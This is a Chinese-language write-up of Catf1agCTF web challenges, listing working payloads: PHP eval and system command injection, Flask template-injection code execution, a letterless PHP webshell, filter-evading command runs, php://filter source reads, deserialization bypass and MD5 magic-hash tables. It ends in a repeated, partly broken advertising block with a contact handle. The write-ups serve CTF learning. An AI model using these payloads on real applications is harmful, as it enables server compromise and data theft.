Catf1agCTF-Web通关合集，网络安全高级工程师必备知识

?cmd=eval($_GET[1]);&1=system(‘ls’);

?cmd=eval($_GET[1]);&1=system(‘cat f1ag_in_there.php’);

不等于0

数组绕过秒了

?num[]=0

easy_flask_1

题目有提示/?cmd=

我们先尝试一下

接下来我们猜测可能为ssti

?cmd={{2*2}}

既然知道是ssti

我们直接查询配置信息，看有没有什么发现

?cmd={{config}}

easy_flask_2

跟上一题一样，我们先测试一下它是否为ssti

这里直接给一个比较通用的payload：

?cmd={% set chr=().class.bases.getitem(0).subclasses().getitem(250).init.globals.builtins.chr %}{{().class.bases[0].subclasses()[250].init.globals.os.popen(chr(108)%2bchr(115)).read()}}

这里的chr(108)%2bchr(115)为ls拼接

可以参考下这个表

chr()表对应大全_chr(12)-CSDN博客表对应大全_chr(12)-CSDN博客")

 接下来就是cat flag了

?cmd={% set chr=().class.bases.getitem(0).subclasses().getitem(250).init.globals.builtins.chr %}{{().class.bases[0].subclasses()[250].init.globals.os.popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(102)%2bchr(42)).read()}}

这里使用的是cat f*（后面不想找了…)

又双叒叕不能相等

源代码：

<?php include('flag.php'); error_reporting(0); show_source('index.php'); $init_num = '999999999999'; $user_num = $_GET['num']; if(isset($user_num)){ if($user_num != $init_num){ if(strlen($user_num) < strlen($init_num)){ if($user_num > $init_num){ echo 'get glag：'.$flag; }else{ echo '你输入的数字小于初始值~'; } }else{ echo '不能大于初始值~'; } }else{ echo '不能相等~'; } }else{ echo '请输入内容~'; } ?>

这里要求num长度小于999999999999又要大于999999999999

提示：字符串开头以xex开头，x代表数字。会被转换成科学计数法（注意一定要是0e/d+的模式）。

payload：

?num=1e12

这里没有发现flag，真奇怪

flag藏在响应头里了，离谱

哦豁~还有一半呢？

打开一片空白

查看源代码

 这里显示flagb，说明还有个flaga应该

查看响应头

接下来就是拼接，base64解码即可

bypass_wakeup

源代码：

<?php show_source(__FILE__); class flag{ public $name = "catflag"; public function __wakeup(){ echo "this is __wakeup
"; } public function __destruct(){ show_source('flag.php'); echo "this is __destruct
"; } } $str = $_GET["ser"]; @$un_str = unserialize($str); echo $un_str->name."
"; ?>

这题是反序列化

比较简单，只要绕过__wakeup即可

序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

<?php show_source(__FILE__); class flag{ public $name = "catflag"; public function __wakeup(){ echo "this is __wakeup
"; } public function __destruct(){ show_source('flag.php'); echo "this is __destruct
"; } } $a=new flag(); echo serialize($a); //O:4:"flag":1:{s:4:"name";s:7:"catflag";} 修改为 ?ser=O:4:"flag":2:{s:4:"name";s:7:"catflag";}  ## 无字符webshell  源代码： <?php $cmd=$_GET['cmd']; if(preg_match("/[A-Za-z0-9]/",$cmd)){ die("giaogiaogiao!!!"); } else { eval($cmd); } highlight_file(__FILE__) ?>

这里要绕过字母和数字

异或绕过有点麻烦，这里看别的师傅写的

想学习的可以参考一下这个文章浅析CTF绕过字符数字构造shell_ctf 只能字母或者数字登录-CSDN博客

?cmd=?><?=`{${~"%a0%b8%ba%ab"}[%a0]}`?>&%a0=ls /

分析下这个Payload，?>闭合了eval自带的<?标签。接下来使用了短标签。{}包含的PHP代码可以被执行，~“%a0%b8%ba%ab"为”_GET"，通过反引号进行shell命令执行。最后我们只要GET传参%a0即可执行命令。

接下来就是cat /flag.txt

?cmd=?><?=`{${~"%a0%b8%ba%ab"}[%a0]}`?>&%a0=cat /flag.txt

舔dog日记

（听哥一句劝，别当舔dog，不喜欢就是不喜欢）

我们先打开日记1看看

这里有filename，盲猜后面是base64编码后的

我们尝试一下flag.php

?filename=ZmxhZy5waHA=

查看源代码即可发现flag

遍历遍历

这里刷新一次就有一句话，应该是要我们写脚本遍历

脚本

import requests
url = “http://subject.catf1ag.cn:47522/” #这里填入题目的url
for i in range(250):
result = requests.get(url)
if ‘catf1ag’ in result.text:
print(result.text)
break

这里需要等几秒才能显示

easy_rce_3

源代码：

<?php highlight_file(__FILE__); if(isset($_GET['cmd'])){ if(!preg_match('/php:\/\/|data:\/\/|phar:\/\/|phpinfo()|info|flag|rm|\/|echo|\.|\*|\?/i',$_GET['cmd'])){ @eval($_GET['cmd']); }else{ echo "danger_string"; } }else{ echo "你啥也不输入，给你个假的flag:flag{error_flag}"; } ?>

这题没有过滤system

?cmd=system(‘ls’);

这里利用文件包含伪协议

?cmd=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=flag.php

 base64解码即可

easy_rce_4

源代码：

<?php error_reporting(0); show_source('index.php'); $cmd = $_GET['a']; $a = '/flag|cat|tac|more|less|[ |<>|?|*|\\\\\'"]/'; if(preg_match($a,$cmd)){ echo "not allow"; } else{ if(strlen($cmd)<=50&$cmd!=''){ echo "you are success!"; } else{ system($cmd); } } ?>

即有过滤，又加了长度限制

这里可以使用nl或者tail

因为这里过滤了空格，可以使用%0a或者%09还有{IFS}等绕过（这里%0a不行）

?a=%ls;6666666666666666666666666666666666666666666666666666666666666

?a=nl%09f1111111111111111111111111ag.php;6666666666666666666666666666666666666666666666666666666666666

flag藏在源代码里面

xss_alert

开始试了很多xss，发现没反应

看了下源代码，发现只要触发alert即可

接下来base64解码即可

[两小时AK赛] 你猜猜是什么注入

开始以为是ssti

看了别的师傅提示tee

tee的功能是从标准输入读取，再写入标准输出和文件。

?catf1ag=ls / | tee 2.txt

简单解释一下，就是将ls /写入2.txt里

然后访问2.txt就会触发ls /

?catf1ag=cat /flag | tee 3.txt

json_2

源代码：

<?php show_source(__FILE__); $strs = json_decode($_GET['strs']); $key = '************************'; $flag = 'catf1ag{***********************************}'; foreach($strs as $keys=>$values){ if($values == $key){ echo $flag; }else{ echo 'failed'; } } ?>

这题跟前面那一题有点不一样

这里key为纯数字或者数字开头的字符串

所以这里改为布尔值true（布尔值可以和任何字符串相等。）

?strs={“key”:true}

MD5弱比较

源代码：

<?php header("Content-Type:text/html;charset=utf-8"); show_source(__FILE__); include('flag.php'); $username = $_GET['username']; $password = $_GET['password']; if($username != $password){ if(md5($username) == md5($password)){ echo 'GET_FLAG：'.$flag; }else{ echo 'md5校验出错...'; } }else{ echo '用户名密码不能相等！'; } ?>

这里简单讲解下弱比较

“= =”：会把两端变量类型转换成相同的，在进行比较。

这里明确说明，在两个相等的符号中，一个字符串与一个数字相比较时，字符串会转换成数值。

例子：

<?php var_dump("name"==0); //true var_dump("1name"==1); //true var_dump("name1"==1) //false var_dump("name1"==0) //true var_dump("0e123456"=="0e4456789"); //true var_dump("0e1abc"=="0"); //true ?>

当出现xex模式的时候代表科学计数法，比如1e3=1*10三次方，在进行比较运算时，如果遇到了0e\d+（意思就是0e就是0e，d+的意思是后面全部是数字）这种字符串，就会将这种字符串解析为科学计数法。所以上面例子中2个数的值都是0因而就相等了。如果不满足0e\d+这种模式就不会相等。

下面提供一下md加密后0e开头的

纯数字类：

240610708 0e462097431906509019562988736854
314282422 0e990995504821699494520356953734
571579406 0e972379832854295224118025748221
903251147 0e174510503823932942361353209384
1110242161 0e435874558488625891324861198103
1320830526 0e912095958985483346995414060832
1586264293 0e622743671155995737639662718498
2302756269 0e250566888497473798724426794462
2427435592 0e067696952328669732475498472343
2653531602 0e877487522341544758028810610885
3293867441 0e471001201303602543921144570260
3295421201 0e703870333002232681239618856220
3465814713 0e258631645650999664521705537122
3524854780 0e507419062489887827087815735195
3908336290 0e807624498959190415881248245271
4011627063 0e485805687034439905938362701775
4775635065 0e998212089946640967599450361168
4790555361 0e643442214660994430134492464512
5432453531 0e512318699085881630861890526097
5579679820 0e877622011730221803461740184915
5585393579 0e664357355382305805992765337023
6376552501 0e165886706997482187870215578015
7124129977 0e500007361044747804682122060876
7197546197 0e915188576072469101457315675502
7656486157 0e451569119711843337267091732412

大写字母类：

QLTHNDT 0e405967825401955372549139051580
QNKCDZO 0e830400451993494058024219903391
EEIZDOI 0e782601363539291779881938479162
TUFEPMC 0e839407194569345277863905212547
UTIPEZQ 0e382098788231234954670291303879
UYXFLOI 0e552539585246568817348686838809
IHKFRNS 0e256160682445802696926137988570
PJNPDWY 0e291529052894702774557631701704
ABJIHVY 0e755264355178451322893275696586
DQWRASX 0e742373665639232907775599582643
DYAXWCA 0e424759758842488633464374063001
GEGHBXL 0e248776895502908863709684713578
GGHMVOE 0e362766013028313274586933780773
GZECLQZ 0e537612333747236407713628225676
NWWKITQ 0e763082070976038347657360817689
NOOPCJF 0e818888003657176127862245791911
MAUXXQC 0e478478466848439040434801845361
MMHUWUV 0e701732711630150438129209816536

payload：

?username=240610708&password=QLTHNDT

MD5强对比

源代码：

<?php header("Content-Type:text/html;charset=utf-8"); show_source(__FILE__); include('flag.php'); $username = $_GET['username']; $password = $_GET['password']; if($username != $password){ if(md5($username) === md5($password)){ echo 'GET_FLAG：'.$flag; }else{ echo 'md5校验出错...'; } }else{ echo '用户名密码不能相等！'; } ?>

这里使用了===强比较

直接构造数组就可以绕过了

payload：

?username[]=1&password[]=2

md5($md5)

源代码：

<?php header("Content-Type:text/html;charset=utf-8"); show_source(__FILE__); include('flag.php'); $md5 = $_GET['md5']; if($md5 == md5($md5)){ echo 'GET_FLAG'.$flag; }else{ echo 'md5校验失败...'; } ?>

一般的md5绕过是传入0e开头的md5值，因为在弱比较时，弱比较中会截取一个字符串的数字，知道遇到字符截止，对于0e+数字的值只会截取e之前的0，所以这里即便是令传入的md5值等于$md5后还需要等于其自身进行md5的值，我们选取0e或者加密后仍为0e开头的数就行例如：0e215962017 、以及这些纯字符串转化后为0e+数字的数:QNKCDZO、s878926199a

payload：

?md5=0e215962017

[原九小时AK赛] passwd

题目描述：
小cat是某公司的安全侦察人员，在2022年9月9日凌晨6点，
小cat抓取到了几条疑似a人员和b人员交流的包，
经过破译，大致意思是“在今年xx月xx日xx点xx分准时进行数据交易”，
但是唯独不能完全破解出来，于是他发到公司的网络安全群寻求帮助：
69d00d9bc39e01687abf84e98e27c889cf1442b53edba27d3235acbeb7b0ae95
（密文格式是：年份必须是4位数，月日时分必须是两位数，需要用0补齐，比如2022年01月01日01时01分

看着像是密码的题，不知道为什么跑web来了

Hash Analyzer - TunnelsUP

不出意外是sha256

题目有提示2022年并且为12位密码

所以编写python脚本

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

一、网安学习成长路线图

网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

f4ad7d083932cb095d.png)

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算